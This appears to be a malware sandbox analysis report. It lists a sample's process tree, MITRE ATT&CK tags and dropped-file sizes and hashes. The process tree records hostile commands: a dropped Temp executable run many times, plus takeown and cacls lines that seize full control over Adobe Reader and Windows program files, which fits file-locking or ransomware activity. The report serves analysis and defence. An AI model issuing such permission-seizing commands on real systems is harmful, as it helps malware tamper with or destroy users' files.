C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "13042853951660741407-1041481693-1787273248-141039755710461329281452616770-508916529"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "CORPCHAR.TXT" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "CORPCHAR.TXT" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "usa03.hsp" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "usa03.hsp" -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "superbar.png" -nobanner2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C2⤵
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1898740516-12358196266046988801064149-492169023-3395190312095835-899050473"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "symbol.txt" -nobanner2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "can.hyp" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "directories.acrodata" -nobanner2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-402604571-7830961391088317070-6460331-1040908554-1245135853915156893466111413"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "MinionPro-It.otf" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "rss.gif" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "reviewers.gif" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "submission_history.gif" -nobanner2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "SY______.PFM" -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"2⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "bl.gif" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"1⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "RTC.der" -nobanner2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "PhotoViewer.dll.mui" -nobanner2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner2⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "ImagingDevices.exe.mui" -nobanner2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"2⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "ImagingDevices.exe.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "ImagingDevices.exe.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "ImagingDevices.exe.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wabmig.exe"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\it-IT\msoeres.dll.mui"1⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\it-IT\msoeres.dll.mui" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "WinMail.exe.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "WinMail.exe.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\es-ES\WinMail.exe.mui" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "blank.jtp" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\blank.jtp"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\blank.jtp" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\it-IT\JNTFiltr.dll.mui"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\it-IT\JNTFiltr.dll.mui" /E /G Admin:F /C1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner2⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\es-ES\PDIALOG.exe.mui"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\es-ES\PDIALOG.exe.mui" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "NBMapTIP.dll.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui"1⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "CP1253.TXT" -nobanner1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-22483709284547986210302538521751705935-1088950031-16533787351194078991941576164"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "eng32.clx" -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "MyriadPro-Regular.otf" -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "RTC.der" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1111473428-256038075-12229851176747268171697896324-8009260301187419914-963193075"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "PDIALOG.exe.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PDIALOG.exe.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\ja-JP\PDIALOG.exe.mui" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\fr-FR\MSPVWCTL.DLL.mui"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\fr-FR\MSPVWCTL.DLL.mui" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\es-ES\Journal.exe.mui"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\es-ES\Journal.exe.mui" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "jnwmon.dll.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoViewer.dll.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui" /E /G Admin:F /C1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "WinMail.exe.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\it-IT\WinMail.exe.mui"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\it-IT\WinMail.exe.mui" /E /G Admin:F /C1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "WinMail.exe.mui" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\de-DE\WinMail.exe.mui"1⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\de-DE\WinMail.exe.mui" /E /G Admin:F /C1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "superbar.png" -nobanner1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "zdingbat.txt" -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"1⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2076181394-911270283-542775974-177525646-7832361801298887536-1908225045-462105779"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2499585722111835653-67730973-129768208310353520116873820701498098838-1063875610"1⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner1⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM"1⤵
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" /E /G Admin:F /C1⤵
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Indicator Removal
2File Deletion
2Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
4KB
-
Filesize
11.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
11.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
11.6MB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
11.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
11.6MB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB
-
Filesize
476KB